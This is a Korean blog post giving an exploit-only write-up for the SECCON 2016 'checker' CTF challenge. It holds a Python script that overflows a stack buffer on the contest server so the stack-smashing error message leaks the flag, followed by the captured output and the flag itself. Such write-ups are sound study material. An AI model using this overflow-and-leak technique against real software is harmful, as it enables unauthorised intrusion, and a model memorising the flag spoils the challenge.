Security/[게임] CTF 풀이
[exploit] 2016 SecconCTF - checker writeups (exploit only)
by blackcon
2016. 12. 11.
#!/usr/bin/env python
import socket
host = 'localhost'
host = "checker.pwn.seccon.jp"
port = 1120
port = 14726
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect( ( host, port ) )
def u_recv( st ):
bf = ''
while st not in bf:
bf += s.recv( 1 )
return bf
print u_recv( "NAME :" )
s.send( "name\n" );
for i in range( 0x180, 0x170, -1 ):
u_recv( ">>" )
pay = ("a"*i)+"\n"
s.send( pay )
print u_recv( ">>" )
s.send( "yes\n" )
print u_recv( "FLAG :" )
pay = "a"*0x178
pay += "\xc0\x10\x60" # flag
s.send( pay+"\n" )
print s.recv( 1024 )
print s.recv( 1024 )
print s.recv( 1024 )
'''
blackcon@bk{~/seccon/exploit/checker}:./pay.py
Hello! What is your name?
NAME :
Do you know flag?
>>
Oh, Really??
Please tell me the flag!
FLAG :
You are a liar...
*** stack smashing detected ***: SECCON{y0u_c4n'7_g37_4_5h3ll,H4h4h4} terminated
'''
